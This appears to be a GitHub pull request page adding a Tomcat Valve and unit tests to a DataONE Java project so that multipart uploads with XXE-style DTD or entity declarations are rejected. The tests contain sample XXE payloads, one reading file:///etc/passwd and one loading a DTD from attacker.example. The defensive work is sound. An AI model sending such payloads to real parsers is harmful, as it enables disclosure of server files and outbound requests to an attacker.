Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
6 changes: 6 additions & 0 deletions pom.xml
Original file line number Diff line number Diff line change
Expand Up @@ -164,6 +164,12 @@
<type>jar</type>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.apache.tomcat</groupId>
<artifactId>tomcat-catalina</artifactId>
<version>9.0.118</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.dataone</groupId>
<artifactId>d1_test_resources</artifactId>
Expand Down
189 changes: 189 additions & 0 deletions src/main/java/org/dataone/security/XmlSecurityValidationValve.java
Original file line number Diff line number Diff line change
@@ -0,0 +1,189 @@
package org.dataone.security;

import org.apache.catalina.connector.Request;
import org.apache.catalina.connector.Response;
import org.apache.catalina.valves.ValveBase;
import org.apache.coyote.InputBuffer;
import org.apache.tomcat.util.net.ApplicationBufferHandler;
import org.apache.commons.fileupload.FileItem;
import org.apache.commons.fileupload.disk.DiskFileItemFactory;
import org.apache.commons.fileupload.servlet.ServletFileUpload;
import org.apache.commons.fileupload.servlet.ServletRequestContext;

import javax.servlet.ServletException;
import javax.servlet.http.HttpServletResponse;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.InputSource;
import org.xml.sax.XMLReader;
import org.xml.sax.ext.DefaultHandler2;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.ByteBuffer;
import java.util.List;

/**
* Temporary mitigation Valve to reject multipart XML parts that declare DTDs/entities (XXE defense).
* Added 2026-07-10.
* Enable via the {@code <Valve>} element under {@code <Host ...>} in server.xml, e.g.:
* {@code <Valve className="org.dataone.security.XmlSecurityValidationValve" />}
*/
public class XmlSecurityValidationValve extends ValveBase {

@Override
public void invoke(Request request, Response response) throws IOException, ServletException {
String contentType = request.getContentType();

// Only inspect if it's a multipart request
if (contentType != null && contentType.toLowerCase().startsWith("multipart/form-data")) {
try {
// 1. Buffer the raw input stream (bounded to avoid memory exhaustion)
final long maxRequestBytes = 10 * 1024 * 1024L; // 10 MiB
long declaredLength = request.getContentLengthLong();
if (declaredLength > maxRequestBytes) {
response.sendError(HttpServletResponse.SC_REQUEST_ENTITY_TOO_LARGE, "Request payload too large.");
return;
}

InputStream rawInputStream = request.getInputStream();
ByteArrayOutputStream baos = new ByteArrayOutputStream(
declaredLength > 0 && declaredLength <= Integer.MAX_VALUE ? (int) declaredLength : 1024);

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

declaredLength <= Integer.MAX_VALUE is always true (so can be omitted, to simplify), because you already checked for if (declaredLength > maxRequestBytes) on line 46

byte[] buffer = new byte[8192];
int len;
long totalRead = 0;
while ((len = rawInputStream.read(buffer)) > -1) {
totalRead += len;
if (totalRead > maxRequestBytes) {
response.sendError(HttpServletResponse.SC_REQUEST_ENTITY_TOO_LARGE, "Request payload too large.");
return;
}
baos.write(buffer, 0, len);
}
byte[] requestBytes = baos.toByteArray();

// 2. Parse the multipart data using Tomcat's built-in FileUpload utilities
ServletRequestContext requestContext = new ServletRequestContext(request) {
@Override
public InputStream getInputStream() {
return new ByteArrayInputStream(requestBytes);
}
};

DiskFileItemFactory factory = new DiskFileItemFactory();
ServletFileUpload upload = new ServletFileUpload(factory);
List<FileItem> items = upload.parseRequest(requestContext);

for (FileItem item : items) {
// Check if the part is an XML content type or looks like XML
String partContentType = item.getContentType();
if (isXmlType(partContentType, item.getName())) {

// 3. Inspect for DTD / External Entities
if (containsForbiddenXmlStructures(item.getInputStream())) {
response.sendError(HttpServletResponse.SC_BAD_REQUEST, "Malicious XML content detected.");
return; // Halt processing immediately
}
}
}

// 4. Re-inject the buffered bytes back into Tomcat's pipeline for downstream processing
request.getCoyoteRequest().setInputBuffer(new InputBuffer() {
private final ByteArrayInputStream bais = new ByteArrayInputStream(requestBytes);

@Override
public int doRead(ApplicationBufferHandler handler) throws IOException {
byte[] buf = new byte[8192];
int read = bais.read(buf);
if (read > 0) {
handler.setByteBuffer(ByteBuffer.wrap(buf, 0, read));
}
return read;
}

@Override
public int available() {
return bais.available();
}
});

} catch (Exception e) {
// Handle parsing errors or malicious attempts gracefully
response.sendError(HttpServletResponse.SC_BAD_REQUEST, "Invalid request payload.");
return;
}
}

// If safe or not multipart, pass to the next valve in the chain
getNext().invoke(request, response);
}

private boolean isXmlType(String contentType, String fileName) {
if (contentType != null) {
String ct = contentType.toLowerCase();
if (ct.contains("text/xml") || ct.contains("application/xml")) {
return true;
}
}
return fileName != null && fileName.toLowerCase().endsWith(".xml");
}
Comment thread
Copilot marked this conversation as resolved.

private boolean containsForbiddenXmlStructures(InputStream xmlStream) {
try {
SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setNamespaceAware(true);

// 1. DO NOT disallow DOCTYPE completely.
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", false);

// 2. Enable external general entities & parameter entities processing
// so our custom resolver can catch them if they are present.
spf.setFeature("http://xml.org/sax/features/external-general-entities", true);
spf.setFeature("http://xml.org/sax/features/external-parameter-entities", true);
spf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", true);

Comment thread
iannesbitt marked this conversation as resolved.
SAXParser saxParser = spf.newSAXParser();
XMLReader xmlReader = saxParser.getXMLReader();

// 3. Create a strict interceptor handler
DefaultHandler2 strictSecurityHandler = new DefaultHandler2() {

// Catch External DTDs and External General Entities
@Override
public InputSource resolveEntity(String name, String publicId, String baseURI, String systemId) throws org.xml.sax.SAXException {
if (systemId != null || publicId != null) {
throw new org.xml.sax.SAXException("Malicious XML: External entity or DTD resolution blocked: " + systemId);
}
return null;
}

// Catch External Parameter Entities inside the DOCTYPE declaration
@Override
public InputSource getExternalSubset(String name, String baseURI) throws org.xml.sax.SAXException {
throw new org.xml.sax.SAXException("Malicious XML: External DTD subset blocked.");
}

// Catch Entity Declarations (like SYSTEM "file:///") before they can even be resolved
@Override
public void externalEntityDecl(String name, String publicId, String systemId) throws org.xml.sax.SAXException {
throw new org.xml.sax.SAXException("Malicious XML: External entity declaration detected.");
}
};

// Register the handler for both resolution and advanced lexical intercepting
xmlReader.setEntityResolver(strictSecurityHandler);
xmlReader.setProperty("http://xml.org/sax/properties/lexical-handler", strictSecurityHandler);

// Parse the stream to trigger the interceptor if anything malicious is declared
xmlReader.parse(new InputSource(xmlStream));

return false; // Safe! No external definitions or resolutions were triggered.
} catch (Exception e) {
// Exception thrown by our security handler means we intercepted an attack vector
return true;
}
}

}
103 changes: 103 additions & 0 deletions src/test/java/org/dataone/security/XmlSecurityValidationValveTest.java
Original file line number Diff line number Diff line change
@@ -0,0 +1,103 @@
package org.dataone.security;

import static org.junit.Assert.assertFalse;
import static org.junit.Assert.assertTrue;

import java.io.ByteArrayInputStream;
import java.io.InputStream;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.nio.charset.StandardCharsets;

import org.junit.Test;

public class XmlSecurityValidationValveTest {

private final XmlSecurityValidationValve valve = new XmlSecurityValidationValve();

@Test
public void identifiesXmlFromContentType() {

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

can we also assert some expected failures?

Copy link
Copy Markdown
Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Adding these shortly...

Copy link
Copy Markdown
Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Added tests with broken xml in 41a1852

assertTrue(isXmlType("application/xml", null));
assertTrue(isXmlType("text/xml; charset=UTF-8", null));
}

@Test
public void identifiesXmlFromFilename() {
assertTrue(isXmlType("application/octet-stream", "payload.xml"));
}

@Test
public void doesNotIdentifyNonXmlPayload() {
assertFalse(isXmlType("application/json", "payload.txt"));
}

@Test
public void rejectsXmlWithExternalEntityDeclaration() {
String maliciousXml =
"<?xml version=\"1.0\"?>"
+ "<!DOCTYPE root [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>"
+ "<root>&xxe;</root>";

assertTrue(containsForbiddenXmlStructures(streamOf(maliciousXml)));
}

@Test
public void rejectsXmlWithExternalDtdDeclaration() {
String maliciousXml =
"<?xml version=\"1.0\"?>"
+ "<!DOCTYPE root SYSTEM \"http://attacker.example/malicious.dtd\">"
+ "<root>ok</root>";

assertTrue(containsForbiddenXmlStructures(streamOf(maliciousXml)));
}

@Test
public void allowsXmlWithoutDtdOrEntityDeclarations() {
String safeXml = "<?xml version=\"1.0\"?><root><value>ok</value></root>";
assertFalse(containsForbiddenXmlStructures(streamOf(safeXml)));
}

@Test
public void rejectsMalformedXmlAsUnexpectedFailure() {
assertTrue(containsForbiddenXmlStructures(streamOf("<?xml version=\"1.0\"?><root>")));
assertTrue(containsForbiddenXmlStructures(streamOf("<root><value>broken</root>")));
}

@Test
public void rejectsXmlWithUndefinedEntityReference() {
String unresolvedEntityXml =
"<?xml version=\"1.0\"?>"
+ "<!DOCTYPE root [<!ENTITY missing SYSTEM \"file:///etc/passwd\">]>"
+ "<root>&missing;</root>";

assertTrue(containsForbiddenXmlStructures(streamOf(unresolvedEntityXml)));
}

private boolean isXmlType(String contentType, String fileName) {
try {
Method method = XmlSecurityValidationValve.class.getDeclaredMethod("isXmlType", String.class, String.class);
method.setAccessible(true);
return (Boolean) method.invoke(valve, contentType, fileName);
} catch (NoSuchMethodException | IllegalAccessException e) {
throw new AssertionError("Failed to access XmlSecurityValidationValve.isXmlType", e);
} catch (InvocationTargetException e) {
throw new AssertionError("Unexpected exception from XmlSecurityValidationValve.isXmlType", e);
}
}

private boolean containsForbiddenXmlStructures(InputStream xmlStream) {
try {
Method method = XmlSecurityValidationValve.class.getDeclaredMethod("containsForbiddenXmlStructures", InputStream.class);
method.setAccessible(true);
return (Boolean) method.invoke(valve, xmlStream);
} catch (NoSuchMethodException | IllegalAccessException e) {
throw new AssertionError("Failed to access XmlSecurityValidationValve.containsForbiddenXmlStructures", e);
} catch (InvocationTargetException e) {
throw new AssertionError("Unexpected exception from XmlSecurityValidationValve.containsForbiddenXmlStructures", e);
}
}

private InputStream streamOf(String value) {
return new ByteArrayInputStream(value.getBytes(StandardCharsets.UTF_8));
}
}
Loading